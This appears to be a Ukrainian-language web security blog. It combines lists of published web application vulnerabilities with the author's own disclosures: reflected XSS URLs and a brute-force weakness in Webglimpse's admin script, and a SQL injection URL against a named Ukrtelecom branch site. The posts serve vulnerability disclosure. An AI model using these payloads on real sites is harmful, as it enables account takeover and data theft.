Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• Citrix Provisioning Services Stream Service 0×40020006 Remote Code Execution Vulnerability (деталі)
• KaiBB 2.0.1 XSS and SQL Injection vulnerabilities (деталі)
• Related POC for JCE Joomla Extension (деталі)
• ZOHO ManageEngine ADSelfService Plus Administrative Access (деталі)
• Google App Enging SDK Code Execution Vulnerability (деталі)
• Citrix Provisioning Services Stream Service 0×40020000 Remote Code Execution Vulnerability (деталі)
• LedgerSMB 1.3.0 released, includes anti-XSRF framework (деталі)
• Multiple vulnerabilities in BugFree (деталі)
• Destination Search Admin Console Access Control Bypass (деталі)
• SQL injection vulnerability in BoonEx Dolphin (деталі)

В даній добірці уразливості в веб додатках:

• HP Business Availability Center (BAC) and Business Service Management (BSM), Remote Unauthorized Access to Sensitive Information (деталі)
• SonicWall Viewpoint v6.0 SP2 - SQL Injection Vulnerability (деталі)
• Phorum 5.2.18 Cross-site scripting vulnerability (деталі)
• Netvolution referer header SQL injection vulnerability (деталі)
• Elastix PBX Extensions Enumeration (деталі)
• EMC SourceOne Web Search Sensitive Information Disclosure Vulnerability (деталі)
• Joomla Component (com_sgicatalog) <= SQL Injection Vulnerability (деталі)
• Active CMS 1.2.0 ‘mod’ Cross-site Scripting Vulnerability (деталі)
• Contao 2.10.1 Cross-site scripting vulnerability (деталі)
• openEngine 2.0 ‘key’ Blind SQL Injection vulnerability (деталі)

В даній добірці уразливості в веб додатках:

• HP StorageWorks Modular Smart Array P2000 G3, Remote Execution of Arbitrary Code (деталі)
• openEngine 2.0 ‘id’ Blind SQL Injection vulnerability (деталі)
• Bitweaver 2.8.1 Multiple Cross-site Scripting Vulnerabilities (деталі)
• European Security Services GPS v1.0 - Multiple Vulnerabilities (деталі)
• Multiple vulnerabilities in Traq (деталі)
• (0Day) HP StorageWorks P2000 G3 Directory Traversal and Default Account Vulnerabilities (деталі)
• Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities (деталі)
• SQL injection vulnerability in ATCOM Netvolution (деталі)
• vTiger CRM 5.2.x <= Remote Code Execution Vulnerability (деталі)
• vTiger CRM 5.2.x <= Multiple Cross Site Scripting Vulnerabilities (деталі)

27.04.2009

У листопаді, 19.11.2008, після попередніх уразливостей Webglimpse, я знайшов Brute Force та Cross-Site Scripting уразливості в Webglimpse. Це локальна пошукова система. Дірки виявив на офіційному сайті системи http://webglimpse.net.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

25.02.2012

Brute Force:

http://site/wgarcmin.cgi

Відсутність захисту від Brute Force атак може використовуватися для отримання доступу до адмінки. Причому можна підібрати логін і пароль до акаунту гостя (якщо вони не оприлюднені публічно), що може бути легше, ніж до акаунту адміна, а потім використати раніше згадані Directory Traversal і Authorization bypass уразливості, щоб отримати доступ до акаунту адміна.

XSS:

http://site/wgarcmin.cgi?URL2FIL=URL+2+File+--%3E&URL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T
http://site/wgarcmin.cgi?FIL2URL=%3C--+File+2+URL&FILE=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T
http://site/wgarcmin.cgi?DOMAIN=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T

Уразливі Webglimpse 2.18.8 та попередні версії. Перевірялося в Webglimpse 2.18.7 та 2.18.8, остання версія 2.20.0 також повинна бути вразлива.

В даній добірці уразливості в веб додатках:

• MailEnable webmail cross-site scripting vulnerability (деталі)
• Serendipity freetag plugin ’serendipity[tagview]’ Cross-Site Scripting vulnerability (деталі)
• AdaptCMS 2.0.1 Multiple security vulnerabilities (деталі)
• SQL injection vulnerability in Flynax Classifieds products (деталі)
• Multiple vulnerability in “Omnidocs” (деталі)
• Пошкодження пам’яти в win32k.sys Microsoft Windows (через Safari) (деталі)
• Advanced Electron Forums (AEF) 1.0.9 <= Cross Site Request Forgery (CSRF) Vulnerability (деталі)
• XSS Vulnerabilities in TWiki < 5.1.0 (деталі)
• Multiple vulnerabilities in Help Desk Software (деталі)
• Patch Notification: ImpressPages CMS Remote code execution (деталі)

В даній добірці уразливості в веб додатках:

• HP Database Archiving Software, Remote Execution of Arbitrary Code (деталі)
• Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration getSubKeys() Remote SQL Injection Exploit (деталі)
• SAP WebAS Malicious SAP Shortcut Generation (деталі)
• SAP WebAS webrfc Cross-Site Scripting (деталі)
• SAP WebAS Remote Denial of Service (деталі)
• Google Chrome HTTPS Address Bar Spoofing (деталі)
• SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability (деталі)
• SAP NetWeaver ipcpricing - information disclose (деталі)
• Multiple Vulnerabilities in IceWarp Mail Server (деталі)
• PunBB 1.3.6 bug (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах The Welcomizer, Kish Guest Posting та AllWebMenus. Для котрих з’явилися експлоіти. The Welcomizer - це плагін для додавання анимації на сайт, Kish Guest Posting - це плагін для надання можливості гостям публікувати записи, AllWebMenus - це плагін для створення веб меню на сайті.

• Wordpress the-welcomizer plugin Cross-Site Scripting Vulnerabilities (деталі)
• Wordpress Kish Guest Posting Plugin 1.0 (uploadify.php) Unrestricted File Upload Vulnerability (деталі)
• AllWebMenus < 1.1.9 WordPress Menu Plugin Arbitrary file upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• HP JetDirect Device Page Directory Traversal (деталі)
• Spring Framework Information Disclosure (деталі)
• Spring Security header injection vulnerability (деталі)
• Spring Framework and Spring Security serialization-based remoting vulnerabilities (деталі)
• Spring Security privilege escalation when using RunAsManager (деталі)
• Certain HP LaserJet Printers, Remote Unauthorized Access to Files (деталі)
• Multiple XSS vulnerabilities in CMS Papoo Light Version (деталі)
• mantis security update (деталі)
• Multiples Vulnerabilities in ManageEngine ServiceDesk Plus (деталі)
• Multiple vulnerabilities in SiT! Support Incident Tracker (деталі)

В даній добірці уразливості в веб додатках:

• HServer webserver - Directory Traversal Vulnerability (деталі)
• MaiNick (ricetta.php?id) Remote SQL injection Vulnerability (деталі)
• Abarkam (detail.php?input) Remote SQL injection Vulnerability (деталі)
• TTW (ricetta.php?id) Remote SQL injection Vulnerability (деталі)
• Pranian Group e107 Cross Site Scripting Vulnerabilities (деталі)
• rails security update (деталі)
• Multiple XSS vulnerabilities in LightNEasy 3.2.4 (деталі)
• XSS in Zikula (деталі)
• Multiple vulnerabilities in MantisBT (деталі)
• bcfg2 security update (деталі)

26.01.2010

У червні, 19.06.2009, я знайшов SQL Injection уразливість на http://kyiv.ukrtelecom.ua - сайті Київської міської філії ВАТ “Укртелеком”. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на www.kyiv.ukrtelecom.ua.

Детальна інформація про уразливість з’явиться пізніше.

18.02.2012

SQL Injection:

http://kyiv.ukrtelecom.ua/webparts/search?ul=’)%20or%201=1–&q=1

В себе на сайті Укртелеком використовує СУБД Oracle.

Дана уразливість вже виправлена, але виправляли вони дуже довго. Що типово для даної компанії (добре що врешті виправили, бо вони це роблять не завжди). При наявності дірок на сайтах Укртелекому, особливо SQL ін’єкцій, зовсім не дивують витоки персональної інформації про клієнтів компанії, що регулярно трапляються.